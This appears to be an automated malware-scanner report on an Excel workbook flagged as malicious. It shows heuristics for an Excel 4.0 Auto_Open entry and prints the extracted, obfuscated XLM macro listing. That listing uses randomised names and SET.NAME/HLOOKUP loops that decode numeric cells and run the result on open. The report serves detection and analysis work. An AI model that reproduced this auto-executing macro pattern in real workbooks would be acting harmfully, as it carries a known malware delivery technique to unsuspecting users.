MALICIOUS
140
Risk Score
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6617 bytes |
SHA-256: 5d3b12200139bc5d57207a4706b96424033b7242f299691f5ca29cdebafb34d1 |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - ZgpZ
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!A160
' 0018 27 LABEL : Cell Value, String Constant - bdYRiVHJFuyw len=0
' 0018 27 LABEL : Cell Value, String Constant - cIxYIOBjMNjb len=0
' 0018 24 LABEL : Cell Value, String Constant - FknPkRxKJ len=0
' 0018 25 LABEL : Cell Value, String Constant - gCTCDadfkW len=0
' 0018 22 LABEL : Cell Value, String Constant - hNyPNLp len=0
' 0018 21 LABEL : Cell Value, String Constant - JRSndG len=0
' 0018 22 LABEL : Cell Value, String Constant - kiFmGTZ len=0
' 0018 26 LABEL : Cell Value, String Constant - ksJkVswPXZF len=0
' 0018 22 LABEL : Cell Value, String Constant - oqMcpFU len=0
' 0018 27 LABEL : Cell Value, String Constant - PIpZeSGMHNVG len=0
' 0018 25 LABEL : Cell Value, String Constant - PsJjfgRWOL len=0
' 0018 25 LABEL : Cell Value, String Constant - QXRXRqpGGI len=0
' 0018 20 LABEL : Cell Value, String Constant - qyuhQ len=0
' 0018 24 LABEL : Cell Value, String Constant - TMUGltGGy len=0
' 0018 22 LABEL : Cell Value, String Constant - vGSOQtb len=0
' 0018 25 LABEL : Cell Value, String Constant - vMcYdKpPON len=0
' 0018 26 LABEL : Cell Value, String Constant - VqAhSdrvbsL len=0
' 0018 21 LABEL : Cell Value, String Constant - XanBeN len=0
' 0018 26 LABEL : Cell Value, String Constant - yMxLePRJouT len=0
' 0018 20 LABEL : Cell Value, String Constant - zXLNH len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' ZgpZ,S43,"",-16.00000000000000000000
' ZgpZ,S44,"",-161.00000000000000000000
' ZgpZ,S45,"",541.00000000000000000000
' ZgpZ,S46,"",-943.00000000000000000000
' ZgpZ,S47,"",-201.00000000000000000000
' ZgpZ,S48,"",-862.00000000000000000000
' ZgpZ,A73,"SET.NAME("cIxYIOBjMNjb",0+VALUE("0"))",""
' ZgpZ,A76,"SET.NAME("hNyPNLp",cIxYIOBjMNjb)",""
' ZgpZ,A81,"SET.NAME("QXRXRqpGGI",cIxYIOBjMNjb)",""
' ZgpZ,A83,"SET.NAME("JRSndG",COUNTA(TMUGltGGy))",""
' ZgpZ,A85,"SET.NAME("vGSOQtb",COUNTA(yMxLePRJouT))",""
' ZgpZ,A88,[],""
' ZgpZ,A93,"SET.NAME("VqAhSdrvbsL","")",""
' ZgpZ,A95,"hNyPNLp",""
' ZgpZ,A100,"SET.NAME("PIpZeSGMHNVG",HLOOKUP("*",TMUGltGGy,hNyPNLp,FALSE))",""
' ZgpZ,A105,"XanBeN",""
' ZgpZ,A107,"SET.NAME("qyuhQ",cIxYIOBjMNjb)",""
' ZgpZ,A112,[],""
' ZgpZ,A116,"qyuhQ",""
' ZgpZ,A118,"vMcYdKpPON",""
' ZgpZ,A120,"bdYRiVHJFuyw",""
' ZgpZ,A122,"zXLNH",""
' ZgpZ,A124,"SET.NAME("oqMcpFU",VALUE(HLOOKUP("*",yMxLePRJouT,zXLNH,FALSE)))",""
' ZgpZ,A127,"gCTCDadfkW",""
' ZgpZ,A132,"VqAhSdrvbsL",""
' ZgpZ,A135,"QXRXRqpGGI",""
' ZgpZ,A140,NEXT(),""
' ZgpZ,A144,"ksJkVswPXZF",""
' ZgpZ,A148,[],""
' ZgpZ,A151,"kiFmGTZ",""
' ZgpZ,A154,NEXT(),""
' ZgpZ,A158,RETURN(),""
' ZgpZ,A186,"SET.NAME("PsJjfgRWOL",A73)",""
' ZgpZ,A188,"TMUGltGGy",""
' ZgpZ,A193,"SET.NAME("yMxLePRJouT",R40C15)",""
' ZgpZ,A198,"SET.NAME("kiFmGTZ",206)",""
' ZgpZ,A203,"SET.NAME("FknPkRxKJ",1)",""
' ZgpZ,A205,PsJjfgRWOL(),""
' ZgpZ,A206,HALT(),""
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.